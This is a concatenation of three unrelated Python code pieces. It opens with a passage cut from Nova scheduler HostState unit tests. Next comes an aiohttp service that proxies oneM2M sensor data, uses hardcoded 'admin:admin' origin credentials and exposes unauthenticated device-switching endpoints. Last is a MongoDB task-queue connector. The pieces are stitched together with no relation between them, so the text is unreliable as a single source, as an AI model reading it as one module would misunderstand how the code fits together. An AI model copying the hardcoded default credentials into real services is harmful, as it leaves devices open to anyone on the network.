                side_effect=lambda a: lambda f: lambda *args: f(*args))
    def test_stat_consumption_from_compute_node(self, sync_mock):
        """Stats and metadata from a ComputeNode land on the HostState."""
        stats = {
            'num_instances': '5',
            'num_proj_12345': '3',
            'num_proj_23456': '1',
            'num_vm_%s' % vm_states.BUILDING: '2',
            'num_vm_%s' % vm_states.SUSPENDED: '1',
            'num_task_%s' % task_states.RESIZE_MIGRATING: '1',
            'num_task_%s' % task_states.MIGRATING: '2',
            'num_os_type_linux': '4',
            'num_os_type_windoze': '1',
            'io_workload': '42',
        }

        hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
        compute = objects.ComputeNode(
            uuid=uuids.cn1,
            stats=stats, memory_mb=1, free_disk_gb=0, local_gb=0,
            local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
            disk_available_least=None,
            updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
            host_ip='127.0.0.1', hypervisor_type='htype',
            hypervisor_hostname='hostname', cpu_info='cpu_info',
            supported_hv_specs=[],
            hypervisor_version=hyper_ver_int, numa_topology=None,
            pci_device_pools=None, metrics=None,
            cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
            disk_allocation_ratio=1.0)

        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        host.update(compute=compute)

        # update() must serialize on the (host, node) lock.
        sync_mock.assert_called_once_with(("fakehost", "fakenode"))
        self.assertEqual(5, host.num_instances)
        self.assertEqual(42, host.num_io_ops)
        self.assertEqual(10, len(host.stats))

        self.assertEqual('127.0.0.1', str(host.host_ip))
        self.assertEqual('htype', host.hypervisor_type)
        self.assertEqual('hostname', host.hypervisor_hostname)
        self.assertEqual('cpu_info', host.cpu_info)
        self.assertEqual([], host.supported_instances)
        self.assertEqual(hyper_ver_int, host.hypervisor_version)

    def test_stat_consumption_from_compute_node_non_pci(self):
        """With no PCI pools on the node, pci_stats ends up empty."""
        stats = {
            'num_instances': '5',
            'num_proj_12345': '3',
            'num_proj_23456': '1',
            'num_vm_%s' % vm_states.BUILDING: '2',
            'num_vm_%s' % vm_states.SUSPENDED: '1',
            'num_task_%s' % task_states.RESIZE_MIGRATING: '1',
            'num_task_%s' % task_states.MIGRATING: '2',
            'num_os_type_linux': '4',
            'num_os_type_windoze': '1',
            'io_workload': '42',
        }

        hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
        compute = objects.ComputeNode(
            uuid=uuids.cn1,
            stats=stats, memory_mb=0, free_disk_gb=0, local_gb=0,
            local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
            disk_available_least=None,
            updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
            host_ip='127.0.0.1', hypervisor_type='htype',
            hypervisor_hostname='hostname', cpu_info='cpu_info',
            supported_hv_specs=[],
            hypervisor_version=hyper_ver_int, numa_topology=None,
            pci_device_pools=None, metrics=None,
            cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
            disk_allocation_ratio=1.0)

        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        host.update(compute=compute)
        self.assertEqual([], host.pci_stats.pools)
        self.assertEqual(hyper_ver_int, host.hypervisor_version)

    def test_stat_consumption_from_compute_node_rescue_unshelving(self):
        """Rescue/unshelve tasks count toward the I/O workload stats."""
        stats = {
            'num_instances': '5',
            'num_proj_12345': '3',
            'num_proj_23456': '1',
            'num_vm_%s' % vm_states.BUILDING: '2',
            'num_vm_%s' % vm_states.SUSPENDED: '1',
            'num_task_%s' % task_states.UNSHELVING: '1',
            'num_task_%s' % task_states.RESCUING: '2',
            'num_os_type_linux': '4',
            'num_os_type_windoze': '1',
            'io_workload': '42',
        }

        hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
        compute = objects.ComputeNode(
            uuid=uuids.cn1,
            stats=stats, memory_mb=0, free_disk_gb=0, local_gb=0,
            local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
            disk_available_least=None,
            updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
            host_ip='127.0.0.1', hypervisor_type='htype',
            hypervisor_hostname='hostname', cpu_info='cpu_info',
            supported_hv_specs=[],
            hypervisor_version=hyper_ver_int, numa_topology=None,
            pci_device_pools=None, metrics=None,
            cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
            disk_allocation_ratio=1.0)

        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        host.update(compute=compute)

        self.assertEqual(5, host.num_instances)
        self.assertEqual(42, host.num_io_ops)
        self.assertEqual(10, len(host.stats))

        self.assertEqual([], host.pci_stats.pools)
        self.assertEqual(hyper_ver_int, host.hypervisor_version)

    @mock.patch('nova.utils.synchronized',
                side_effect=lambda a: lambda f: lambda *args: f(*args))
    @mock.patch('nova.virt.hardware.get_host_numa_usage_from_instance')
    @mock.patch('nova.objects.Instance')
    @mock.patch('nova.virt.hardware.numa_fit_instance_to_host')
    @mock.patch('nova.virt.hardware.host_topology_and_format_from_host')
    def test_stat_consumption_from_instance(self, host_topo_mock,
                                            numa_fit_mock,
                                            instance_init_mock,
                                            numa_usage_mock,
                                            sync_mock):
        """Consuming a request updates counters and NUMA usage in place."""
        fake_numa_topology = objects.InstanceNUMATopology(
            cells=[objects.InstanceNUMACell()])
        fake_host_numa_topology = mock.Mock()
        fake_instance = objects.Instance(numa_topology=fake_numa_topology)
        host_topo_mock.return_value = (fake_host_numa_topology, True)
        numa_usage_mock.return_value = fake_host_numa_topology
        numa_fit_mock.return_value = fake_numa_topology
        instance_init_mock.return_value = fake_instance
        spec_obj = objects.RequestSpec(
            instance_uuid=uuids.instance,
            flavor=objects.Flavor(root_gb=0, ephemeral_gb=0, memory_mb=0,
                                  vcpus=0),
            numa_topology=fake_numa_topology,
            pci_requests=objects.InstancePCIRequests(requests=[]))
        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        self.assertIsNone(host.updated)
        host.consume_from_request(spec_obj)
        numa_fit_mock.assert_called_once_with(fake_host_numa_topology,
                                              fake_numa_topology,
                                              limits=None, pci_requests=None,
                                              pci_stats=None)
        numa_usage_mock.assert_called_once_with(host, fake_instance)
        sync_mock.assert_called_once_with(("fakehost", "fakenode"))
        self.assertEqual(fake_host_numa_topology, host.numa_topology)
        self.assertIsNotNone(host.updated)

        # Consume a second request to verify the counters accumulate and
        # the NUMA usage is recomputed.
        second_numa_topology = objects.InstanceNUMATopology(
            cells=[objects.InstanceNUMACell()])
        spec_obj = objects.RequestSpec(
            instance_uuid=uuids.instance,
            flavor=objects.Flavor(root_gb=0, ephemeral_gb=0, memory_mb=0,
                                  vcpus=0),
            numa_topology=second_numa_topology,
            pci_requests=objects.InstancePCIRequests(requests=[]))
        second_host_numa_topology = mock.Mock()
        numa_usage_mock.return_value = second_host_numa_topology
        numa_fit_mock.return_value = second_numa_topology

        host.consume_from_request(spec_obj)
        self.assertEqual(2, host.num_instances)
        self.assertEqual(2, host.num_io_ops)
        self.assertEqual(2, numa_usage_mock.call_count)
        self.assertEqual(((host, fake_instance),), numa_usage_mock.call_args)
        self.assertEqual(second_host_numa_topology, host.numa_topology)
        self.assertIsNotNone(host.updated)

    def test_stat_consumption_from_instance_pci(self):
        """A matching PCI request consumes a device from the host pools."""
        inst_topology = objects.InstanceNUMATopology(
            cells = [objects.InstanceNUMACell(
                cpuset=set([0]),
                memory=512, id=0)])

        fake_requests = [{'request_id': uuids.request_id, 'count': 1,
                          'spec': [{'vendor_id': '8086'}]}]
        fake_requests_obj = objects.InstancePCIRequests(
            requests=[objects.InstancePCIRequest(**r)
                      for r in fake_requests],
            instance_uuid=uuids.instance)
        req_spec = objects.RequestSpec(
            instance_uuid=uuids.instance,
            project_id='12345',
            numa_topology=inst_topology,
            pci_requests=fake_requests_obj,
            flavor=objects.Flavor(root_gb=0,
                                  ephemeral_gb=0,
                                  memory_mb=512,
                                  vcpus=1))
        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        self.assertIsNone(host.updated)
        # One matching device in the pool; the request should drain it.
        host.pci_stats = pci_stats.PciDeviceStats(
            [objects.PciDevicePool(vendor_id='8086',
                                   product_id='15ed',
                                   numa_node=1,
                                   count=1)])
        host.numa_topology = fakes.NUMA_TOPOLOGY
        host.consume_from_request(req_spec)
        self.assertIsInstance(req_spec.numa_topology,
                              objects.InstanceNUMATopology)

        # The device's NUMA node (cell 1) absorbed the memory/CPU usage.
        self.assertEqual(512, host.numa_topology.cells[1].memory_usage)
        self.assertEqual(1, host.numa_topology.cells[1].cpu_usage)
        self.assertEqual(0, len(host.pci_stats.pools))
        self.assertIsNotNone(host.updated)

    def test_stat_consumption_from_instance_with_pci_exception(self):
        """A failed PCI claim must not touch the host's 'updated' stamp."""
        fake_requests = [{'request_id': uuids.request_id, 'count': 3,
                          'spec': [{'vendor_id': '8086'}]}]
        fake_requests_obj = objects.InstancePCIRequests(
            requests=[objects.InstancePCIRequest(**r)
                      for r in fake_requests],
            instance_uuid=uuids.instance)
        req_spec = objects.RequestSpec(
            instance_uuid=uuids.instance,
            project_id='12345',
            numa_topology=None,
            pci_requests=fake_requests_obj,
            flavor=objects.Flavor(root_gb=0,
                                  ephemeral_gb=0,
                                  memory_mb=1024,
                                  vcpus=1))
        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        self.assertIsNone(host.updated)
        fake_updated = mock.sentinel.fake_updated
        host.updated = fake_updated
        host.pci_stats = pci_stats.PciDeviceStats()
        with mock.patch.object(host.pci_stats, 'apply_requests',
                               side_effect=exception.PciDeviceRequestFailed):
            host.consume_from_request(req_spec)
        self.assertEqual(fake_updated, host.updated)

    def test_resources_consumption_from_compute_node(self):
        """Monitor metrics and the NUMA topology are parsed from the node."""
        _ts_now = datetime.datetime(2015, 11, 11, 11, 0, 0)
        metrics = [
            dict(name='cpu.frequency',
                 value=1.0,
                 source='source1',
                 timestamp=_ts_now),
            dict(name='numa.membw.current',
                 numa_membw_values={"0": 10, "1": 43},
                 source='source2',
                 timestamp=_ts_now),
        ]
        hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
        compute = objects.ComputeNode(
            uuid=uuids.cn1,
            metrics=jsonutils.dumps(metrics),
            memory_mb=0, free_disk_gb=0, local_gb=0,
            local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
            disk_available_least=None,
            updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
            host_ip='127.0.0.1', hypervisor_type='htype',
            hypervisor_hostname='hostname', cpu_info='cpu_info',
            supported_hv_specs=[],
            hypervisor_version=hyper_ver_int,
            numa_topology=fakes.NUMA_TOPOLOGY._to_json(),
            stats=None, pci_device_pools=None,
            cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
            disk_allocation_ratio=1.0)
        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
        host.update(compute=compute)

        self.assertEqual(len(host.metrics), 2)
        self.assertEqual(1.0, host.metrics.to_list()[0]['value'])
        self.assertEqual('source1', host.metrics[0].source)
        self.assertEqual('cpu.frequency', host.metrics[0].name)
        self.assertEqual('numa.membw.current', host.metrics[1].name)
        self.assertEqual('source2', host.metrics.to_list()[1]['source'])
        self.assertEqual({'0': 10, '1': 43},
                         host.metrics[1].numa_membw_values)
        # The NUMA topology is kept in its JSON (string) form on the state.
        self.assertIsInstance(host.numa_topology, six.string_types)

    def test_stat_consumption_from_compute_node_not_ready(self):
        """An incomplete compute record must not overwrite the defaults."""
        compute = objects.ComputeNode(free_ram_mb=100,
                                      uuid=uuids.compute_node_uuid)
        host = host_manager.HostState("fakehost", "fakenode", uuids.cell)

        host._update_from_compute_node(compute)
        # Because compute record not ready, the update of free ram
        # will not happen and the value will still be 0
        self.assertEqual(0, host.free_ram_mb)
| |
#! /usr/bin/python3
__author__ = 'huanpc'
import asyncio
import http.client
from aiohttp import web
import logging
import sys
import cloudAMPQclient
import influxdb_client
from prometheus_export import PrometheusClient
import os
# Addressing configuration for this web service and for the upstream oneM2M
# CSE.  The CSE endpoint can be overridden via the ONEM2M_HOST_NAME and
# ONEM2M_PORT environment variables.
PROTOCOL = 'http'
HOST = '0.0.0.0'
PORT = 9090
M2M_HOST = '127.0.0.1'
if os.environ.get('ONEM2M_HOST_NAME'):
    M2M_HOST = os.environ['ONEM2M_HOST_NAME']
M2M_PORT = '8080'
if os.environ.get('ONEM2M_PORT'):
    M2M_PORT = os.environ['ONEM2M_PORT']
# 'host:port' string used for every HTTP request to the CSE.
DOMAIN = M2M_HOST + ':' + M2M_PORT
# Public name of this host, advertised in subscription callback URLs.
HOST_NAME = HOST
if os.environ.get('HOST_NAME'):
    HOST_NAME = os.environ['HOST_NAME']
logger = logging.getLogger('RESOURCE_TRACKING')
logging.basicConfig(stream=sys.stderr, level=getattr(logging, 'INFO'))
prometheus_client = PrometheusClient()
@asyncio.coroutine
def get_resource_state(request):
    """Proxy the latest DATA content instance of one AE from the CSE.

    The ``app_id`` path parameter names the oneM2M application; the literal
    'all' aggregates the three well-known sensor apps into one document.

    Fixes: HTTP connections are now closed (they were leaked), and the
    aggregation loop no longer shadows the ``app_id`` parameter.

    :param request: aiohttp request with an ``app_id`` match-info key.
    :returns: aiohttp XML response.
    """
    app_id = request.match_info.get('app_id')
    if app_id == 'all':
        app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
        all_response = '<?xml version="1.0" encoding="UTF-8"?><root>'
        for sensor_id in app_ids:
            resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + sensor_id + '/' + 'DATA' + '/' + 'la'
            con = http.client.HTTPConnection(DOMAIN)
            header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
            try:
                con.request('GET', resource_uri, '', header)
                raw = con.getresponse().read().decode()
            finally:
                con.close()  # previously leaked one socket per sensor
            # Strip the per-document XML declaration so the concatenated
            # payload remains a single well-formed XML document.
            raw = raw.replace('<?xml version="1.0" encoding="UTF-8"?>', '')
            all_response += raw
        all_response += '</root>'
        logger.info("Request: GET/URI:" + all_response)
        return web.Response(status=200, body=all_response.encode('utf-8'), content_type="application/xml")
    else:
        # e.g. 'http://127.0.0.1:8080/~/mn-cse/mn-name/LAMP_0/DATA/la'
        resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA' + '/' + 'la'
        con = http.client.HTTPConnection(DOMAIN)
        header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
        try:
            con.request('GET', resource_uri, '', header)
            payload = con.getresponse().read()
        finally:
            con.close()
        logger.info("Request: GET/URI:" + resource_uri)
        return web.Response(status=200, body=payload, content_type="application/xml")
@asyncio.coroutine
def get_all_resources_uri(request):
    """Return the URIs of every AE (ty=2) registered on the local mn-cse.

    Fixes: the HTTP connection is now closed (it was leaked), and the
    pointless ``decode().encode('utf-8')`` round-trip on the body (a no-op
    for valid UTF-8) is removed.
    """
    # e.g. http://127.0.0.1:8080/~/mn-cse?fu=1&poa=sample&ty=2
    uri = '/~/mn-cse?fu=1&poa=sample&ty=2'
    con = http.client.HTTPConnection(DOMAIN)
    header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
    try:
        con.request('GET', uri, '', header)
        payload = con.getresponse().read()
    finally:
        con.close()
    logger.info("Request: GET/URI:" + uri)
    return web.Response(status=200, body=payload)
@asyncio.coroutine
def get_all_resources_descriptor(request):
    """Return the latest DESCRIPTOR content of the temperature sensor AE.

    Fixes: the HTTP connection is now closed (it was leaked), and the
    redundant ``decode().encode('utf-8')`` round-trip is removed.
    """
    # e.g. http://127.0.0.1:8080/~/mn-cse/mn-name/TEMPERATURE_SENSOR/DESCRIPTOR/la
    uri = '/~/mn-cse/mn-name/TEMPERATURE_SENSOR/DESCRIPTOR/la'
    con = http.client.HTTPConnection(DOMAIN)
    header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
    try:
        con.request('GET', uri, '', header)
        payload = con.getresponse().read()
    finally:
        con.close()
    logger.info("Request: GET/URI:" + uri)
    return web.Response(status=200, body=payload)
@asyncio.coroutine
def get_all_resource_state():
    """Aggregate the latest DATA of the well-known sensors into one document.

    Bug fix: each proxied payload carries its own ``<?xml ...?>``
    declaration, so concatenating them produced invalid XML; the
    declarations are now stripped, matching get_resource_state().
    Connections are also closed instead of leaked.
    """
    app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
    # e.g. 'http://127.0.0.1:8080/~/mn-cse/mn-name/LAMP_0/DATA/la'
    all_response = '<root>'
    for app_id in app_ids:
        resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA' + '/' + 'la'
        con = http.client.HTTPConnection(DOMAIN)
        header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
        try:
            con.request('GET', resource_uri, '', header)
            raw = con.getresponse().read().decode()
        finally:
            con.close()
        all_response += raw.replace('<?xml version="1.0" encoding="UTF-8"?>', '')
    all_response += '</root>'
    logger.info("Request: GET/URI:" + all_response)
    return web.Response(status=200, body=all_response.encode('utf-8'))
@asyncio.coroutine
def monitor_all_register(request):
    """Subscribe this service to the DATA container of every AE found on
    the oneM2M host named in the request path."""
    one_m2m_uri = request.match_info.get('oneM2M_host') + ':' + M2M_PORT
    api = 'sample'
    logger.info("DOMAIN: " + DOMAIN)
    logger.info("monitor_all: " + api)
    resource_ids = get_all_resource_id(api=api, one_m2m_uri=one_m2m_uri)
    for resource_id in resource_ids:
        monitor_register_one(resource_id, one_m2m_uri=one_m2m_uri)
    return web.Response(status=200, body=' '.encode('utf-8'))
def get_all_resource_id(api, one_m2m_uri):
    """Discover AE resource paths on the IN-CSE filtered by *api*.

    Parses the whitespace-separated path list out of the <m2m:uril>
    element of the discovery response and returns it as a list.
    """
    # e.g. GET http://127.0.0.1:8080/~/in-cse/in-name?fu=1&api=sample&ty=2 returns
    # <m2m:uril ...>/mn-cse/mn-name/SENSOR_1 /mn-cse/mn-name/SENSOR_2 ...</m2m:uril>
    discovery_uri = '/~/in-cse/in-name?fu=1&api={}&ty=2'.format(api)
    connection = http.client.HTTPConnection(one_m2m_uri)
    connection.request('GET', discovery_uri, None, {'X-M2M-Origin': 'admin:admin'})
    payload = connection.getresponse().read().decode()
    opening_tag = '<m2m:uril xmlns:m2m="http://www.onem2m.org/xml/protocols">'
    start = payload.find(opening_tag) + len(opening_tag)
    end = payload.find('</m2m:uril>')
    return payload[start:end].split(' ')
def monitor_register_one(resource_uri, one_m2m_uri):
    """POST a oneM2M subscription (ty=23) on one AE's DATA container so
    change notifications are delivered to this service's /monitor endpoint.

    Fire-and-forget: the CSE response is deliberately not read.
    """
    data_container_uri = '/~' + resource_uri + '/DATA'
    headers = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml;ty=23", "X-M2M-NM": "SUB_MY_SENSOR",
               "Connection": "close"}
    body = """
    <m2m:sub xmlns:m2m="http://www.onem2m.org/xml/protocols">
        <nu>http://{host}:{port}/monitor</nu>
        <nct>2</nct>
    </m2m:sub>
    """.format(host=HOST_NAME, port=PORT)
    connection = http.client.HTTPConnection(one_m2m_uri)
    connection.request('POST', data_container_uri, body.encode('utf-8'), headers)
    # response = connection.getresponse()
    logger.info("Monitor: " + data_container_uri)
@asyncio.coroutine
def monitor_register(request):
    """Handler: subscribe to one AE's DATA container (app id from the URL)."""
    app_id = request.match_info.get('app_id')
    target_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA'
    headers = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml;ty=23", "X-M2M-NM": "SUB_MY_SENSOR_2",
               "Connection": "close"}
    body = """
    <m2m:sub xmlns:m2m="http://www.onem2m.org/xml/protocols">
        <nu>http://{host}:{port}/monitor</nu>
        <nct>2</nct>
    </m2m:sub>
    """.format(host=HOST, port=PORT)
    connection = http.client.HTTPConnection(DOMAIN)
    connection.request('POST', target_uri, body.encode('utf-8'), headers)
    reply = connection.getresponse()
    logger.info("Register monitor" + str(reply.read().decode()))
    return web.Response(status=200, body='watting'.encode('utf-8'))
@asyncio.coroutine
def get_resource_description(request):
    """Handler: fetch the latest DESCRIPTOR content instance of one AE."""
    app_id = request.match_info.get('app_id')
    # e.g. http://127.0.0.1:8080/~/mn-cse/mn-name/MY_SENSOR/DESCRIPTOR/ol
    descriptor_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DESCRIPTOR' + '/' + 'la'
    headers = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
    connection = http.client.HTTPConnection(DOMAIN)
    connection.request('GET', descriptor_uri, '', headers)
    reply = connection.getresponse()
    logger.info("Request: GET/URI:" + descriptor_uri)
    return web.Response(status=200, body=reply.read().decode().encode('utf-8'))
@asyncio.coroutine
def switchON(request):
    """Handler: POST a switchOn operation to every known AE.

    Fire-and-forget: the per-sensor responses are deliberately not read.

    Fix: `all_response` was only assigned inside the loop body, so an
    empty app list would raise NameError at the final return; it is now
    initialised before the loop (mirroring switchOFF's structure).
    """
    time_delay = request.match_info.get('timeDelay')
    # /mn-cse/mn-name/TEMPERATURE_SENSOR?appId=TEMPERATURE_SENSOR&op=switchOn&timeDelay=0
    app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
    all_response = 'waitting!'
    for app_id in app_ids:
        resource_uri = '/~/' + 'mn-cse/mn-name/' + app_id + '?appId=' + app_id + '&op=switchOn&timeDelay=' + str(
            time_delay)
        con = http.client.HTTPConnection(DOMAIN)
        header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml", "Connection": "close"}
        con.request('POST', resource_uri, '', header)
        # response = con.getresponse()
        # all_response += response.read().decode()
        logger.info("Request: GET/URI:" + resource_uri)
    return web.Response(status=200, body=all_response.encode('utf-8'))
@asyncio.coroutine
def switchOFF(request):
    """Handler: POST a switchOff operation to every known AE.

    Fire-and-forget: the per-sensor responses are deliberately not read.
    """
    time_delay = request.match_info.get('timeDelay')
    # /mn-cse/mn-name/TEMPERATURE_SENSOR?appId=TEMPERATURE_SENSOR&op=switchOn&timeDelay=0
    app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
    all_response = ''
    for app_id in app_ids:
        target_uri = ('/~/' + 'mn-cse/mn-name/' + app_id + '?appId=' + app_id +
                      '&op=switchOff&timeDelay=' + str(time_delay))
        connection = http.client.HTTPConnection(DOMAIN)
        headers = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml", "Connection": "close"}
        connection.request('POST', target_uri, '', headers)
        # response = connection.getresponse()
        # all_response += response.read().decode()
        all_response = 'waitting!'
        logger.info("Request: GET/URI:" + target_uri)
    return web.Response(status=200, body=all_response.encode('utf-8'))
@asyncio.coroutine
def monitor(request):
    """Notification sink for the oneM2M subscriptions created above.

    Receives the subscription notification body, un-escapes the XML
    entities, extracts the <obj>...</obj> fragment, publishes the full
    payload to CloudAMQP and exports the fragment to Prometheus.

    Fix: the original `data.replace('<', '<').replace('"', '"')` was a
    no-op — a garbled transcription of the XML-entity unescape below.
    """
    data = yield from request.text()
    data = data.replace('&lt;', '<').replace('&quot;', '"')
    start_index = data.find('<obj>')
    end_index = data.find('</obj>')
    # NOTE(review): start_index - 1 includes one character before '<obj>'
    # and yields a strange slice when the tag is absent (find == -1) —
    # verify against a real notification payload.
    raw_data = data[start_index - 1:end_index + len('</obj>') + 1]
    logger.info(raw_data)
    if cloudAMPQclient.publish_message(data):
        logger.info('---> Publish message to CloudAMPQ')
    else:
        logger.info('---> Cant connect to AMPQ server')
    logger.info('---> Store data to influxdb')
    # influxdb_client.store_data(raw_data)
    logger.info('---> Export data to prometheus')
    prometheus_client.export_data(xml_data=raw_data)
    return web.Response(status=200, body=' '.encode('utf-8'))
# <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
# <obj>
# <str val="TEMPERATURE_SENSOR" name="appId"/>
# <str val="temperature" name="category"/>
# <int val="73" name="data"/>
# <str val="celsius" name="unit"/>
# </obj>
@asyncio.coroutine
def tracking(request):
    """Handler: consume one message from CloudAMQP and return it."""
    logger.info('---> Cosume message from CloudAMPQ')
    payload = cloudAMPQclient.consume_message()
    return web.Response(status=200, body=payload.encode('utf-8'))
@asyncio.coroutine
def init(loop):
    """Build the aiohttp application, register all routes and start the
    HTTP server on HOST:PORT.  Returns the created server object."""
    app = web.Application(loop=loop)
    # Get resource description
    app.router.add_route('GET', '/resource/{app_id}/descriptor', get_resource_description)
    # Get resource state
    # NOTE(review): this variable route is registered before
    # '/resource/all/state', so a request for /resource/all/state matches
    # {app_id}='all' here and get_all_resource_state is never reached —
    # confirm intended route precedence.
    app.router.add_route('GET', '/resource/{app_id}/state', get_resource_state)
    # Get resources state
    app.router.add_route('GET', '/resource/all/state', get_all_resource_state)
    # Switch on all resource
    # NOTE(review): aiohttp route paths do not include query strings; the
    # literal '?timeDelay={timeDelay}' is matched as part of the path, so
    # these two routes likely never match real requests — confirm and move
    # timeDelay to request.rel_url.query or a path segment.
    app.router.add_route('GET', '/all/resource/switchON?timeDelay={timeDelay}', switchON)
    # Switch off all resource
    app.router.add_route('GET', '/all/resource/switchOFF?timeDelay={timeDelay}', switchOFF)
    app.router.add_route('POST', '/monitor', monitor)
    app.router.add_route('GET', '/{oneM2M_host}/monitor/all/register', monitor_all_register)
    app.router.add_route('GET', '/monitor/register/{app_id}', monitor_register)
    srv = yield from loop.create_server(app.make_handler(), HOST, PORT)
    print("Server started at " + HOST + ":" + str(PORT))
    return srv
# Script entry point: create the event loop, start the aiohttp server and
# run until interrupted with Ctrl-C.
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
try:
    loop.run_forever()
except KeyboardInterrupt:
    # Graceful shutdown on Ctrl-C; the process simply exits.
    pass
| |
import pymongo
from . import _connector
class Connector(
    _connector.Connector,
):
    """MongoDB implementation of the tasker connector interface.

    A single ``pymongo.MongoClient`` backs two collections in the
    ``tasker`` database: ``results`` acts as a key/value store and
    ``task_queue`` as a priority task queue.
    """
    name = 'mongo'

    # Numeric priority stored with each queued item; lower values are
    # popped first (queue_pop sorts ascending on 'priority').
    # Fix: the original if/elif chains in queue_push / queue_push_bulk
    # left priority_value unbound for an unknown priority, producing a
    # confusing NameError; an unknown priority now raises KeyError.
    _priority_values = {
        'HIGH': 0,
        'NORMAL': 1,
    }

    def __init__(
        self,
        mongodb_uri,
    ):
        """Connect to MongoDB at *mongodb_uri* and ensure indexes exist."""
        super().__init__()
        self.mongodb_uri = mongodb_uri
        self.connection = pymongo.MongoClient(
            host=mongodb_uri,
        )
        # Index backing queue_pop's filter (queue_name) + sort (priority).
        self.connection.tasker.task_queue.create_index(
            keys=[
                (
                    'queue_name',
                    pymongo.DESCENDING,
                ),
                (
                    'priority',
                    pymongo.ASCENDING,
                ),
            ],
            background=True,
        )
        self.connection.tasker.results.create_index(
            keys=[
                (
                    'value',
                    pymongo.ASCENDING,
                ),
            ],
            background=True,
        )

    def key_set(
        self,
        key,
        value,
    ):
        """Upsert *value* under *key*.

        Returns True only when a brand-new document was inserted
        (``upserted_id`` is set); False when an existing key was
        overwritten.
        """
        update_one_result = self.connection.tasker.results.update_one(
            filter={
                'key': key,
            },
            update={
                '$set': {
                    'key': key,
                    'value': value,
                },
            },
            upsert=True,
        )
        return update_one_result.upserted_id is not None

    def key_get(
        self,
        key,
    ):
        """Return the value stored under *key*, or None when absent."""
        document = self.connection.tasker.results.find_one(
            filter={
                'key': key,
            },
        )
        if document:
            return document['value']
        else:
            return None

    def key_delete(
        self,
        key,
    ):
        """Delete *key*; return True when a document was actually removed."""
        delete_one_result = self.connection.tasker.results.delete_one(
            filter={
                'key': key,
            },
        )
        return delete_one_result.deleted_count > 0

    def queue_pop(
        self,
        queue_name,
    ):
        """Atomically pop the highest-priority item from *queue_name*.

        Returns the stored value, or None when the queue is empty.
        """
        document = self.connection.tasker.task_queue.find_one_and_delete(
            filter={
                'queue_name': queue_name,
            },
            projection={
                'value': 1,
            },
            sort=[
                (
                    'priority',
                    pymongo.ASCENDING,
                ),
            ],
        )
        if document:
            return document['value']
        else:
            return None

    def queue_pop_bulk(
        self,
        queue_name,
        number_of_items,
    ):
        """Pop up to *number_of_items* values from *queue_name*.

        Stops early when the queue runs dry; each pop is individually
        atomic but the batch as a whole is not.
        """
        documents = []
        for i in range(number_of_items):
            document = self.connection.tasker.task_queue.find_one_and_delete(
                filter={
                    'queue_name': queue_name,
                },
                projection={
                    'value': 1,
                },
                sort=[
                    (
                        'priority',
                        pymongo.ASCENDING,
                    ),
                ],
            )
            if document:
                documents.append(document['value'])
            else:
                break
        return documents

    def queue_push(
        self,
        queue_name,
        item,
        priority='NORMAL',
    ):
        """Append *item* to *queue_name*.

        *priority* must be 'HIGH' or 'NORMAL'; anything else raises
        KeyError.  Returns the write acknowledgement flag.
        """
        insert_one_result = self.connection.tasker.task_queue.insert_one(
            document={
                'queue_name': queue_name,
                'priority': self._priority_values[priority],
                'value': item,
            }
        )
        return insert_one_result.acknowledged

    def queue_push_bulk(
        self,
        queue_name,
        items,
        priority='NORMAL',
    ):
        """Append every element of *items* to *queue_name* in one round trip.

        *priority* must be 'HIGH' or 'NORMAL'; anything else raises
        KeyError.  Returns the write acknowledgement flag.
        """
        priority_value = self._priority_values[priority]
        insert_many_result = self.connection.tasker.task_queue.insert_many(
            documents=[
                {
                    'queue_name': queue_name,
                    'priority': priority_value,
                    'value': item,
                }
                for item in items
            ]
        )
        return insert_many_result.acknowledged

    def queue_length(
        self,
        queue_name,
    ):
        """Return the number of items currently queued under *queue_name*."""
        return self.connection.tasker.task_queue.count_documents(
            filter={
                'queue_name': queue_name,
            },
        )

